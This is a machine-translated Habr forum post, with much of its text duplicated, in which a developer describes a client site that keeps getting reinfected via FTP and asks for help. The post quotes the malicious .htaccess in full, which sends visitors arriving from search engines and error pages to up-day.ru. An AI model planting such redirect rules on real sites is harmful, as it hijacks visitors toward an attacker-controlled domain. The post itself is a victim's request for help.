FTP site infection
Good evening, dear habravchane!
I have an unpleasant situation. Made the site to the client. He is satisfied, the money received.
But a month later, I discovered that when entering the site Avira antivirus starts to curse. Says that the page is infected with WebGen. Browsing index.php found that at the end of the file is an iframe that downloads malicious code. It seems to be a clear case - he treated the car (Avira, Avast then cureit!), Changed the password on the hosting. The password did not tell anyone.
')
A month has passed, and I discover a more interesting point: when I visit a client’s site, I’m being thrown to another site. Immediately go to FTP. Watching index.php not touched. But .htaccess looks quite predictable:
I fly a car (with the same antiviruses as listed above), change the password, upload the old .htaccess. Everyone is happy. But it was not there. It takes less than 12 hours and I again observe the old picture. Zamete, the password did not tell anyone. I check the car - everything is clean. Change password again, for the third time. Less than half a day passes again and the site is infected. The client is in a panic, trust is lost.
But the problem is not solved. Maybe someone faced with this kind of infection, or has thoughts on this matter?
Perhaps I am not alone in this kind of problem?
In any case, I am thankful in advance to everyone who responds to my request for help.
PS Unsubscribed by the registrar up-day.ru. Will it make sense?
PPS Abuse replied that he only registered the name. And what is needed to write to the hoster. Wrote, wait.
I have an unpleasant situation. Made the site to the client. He is satisfied, the money received.
But a month later, I discovered that when entering the site Avira antivirus starts to curse. Says that the page is infected with WebGen. Browsing index.php found that at the end of the file is an iframe that downloads malicious code. It seems to be a clear case - he treated the car (Avira, Avast then cureit!), Changed the password on the hosting. The password did not tell anyone.
')
A month has passed, and I discover a more interesting point: when I visit a client’s site, I’m being thrown to another site. Immediately go to FTP. Watching index.php not touched. But .htaccess looks quite predictable:
# HostRule
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule ^(.*)$ up-day.ru [R=301,L]
ErrorDocument 401 up-day.ru
ErrorDocument 403 up-day.ru
ErrorDocument 404 up-day.ru
ErrorDocument 500 up-day.ru
# /HostRule
I fly a car (with the same antiviruses as listed above), change the password, upload the old .htaccess. Everyone is happy. But it was not there. It takes less than 12 hours and I again observe the old picture. Zamete, the password did not tell anyone. I check the car - everything is clean. Change password again, for the third time. Less than half a day passes again and the site is infected. The client is in a panic, trust is lost.
But the problem is not solved. Maybe someone faced with this kind of infection, or has thoughts on this matter?
Perhaps I am not alone in this kind of problem?
In any case, I am thankful in advance to everyone who responds to my request for help.
PS Unsubscribed by the registrar up-day.ru. Will it make sense?
PPS Abuse replied that he only registered the name. And what is needed to write to the hoster. Wrote, wait.
Source: https://habr.com/ru/post/79687/
All Articles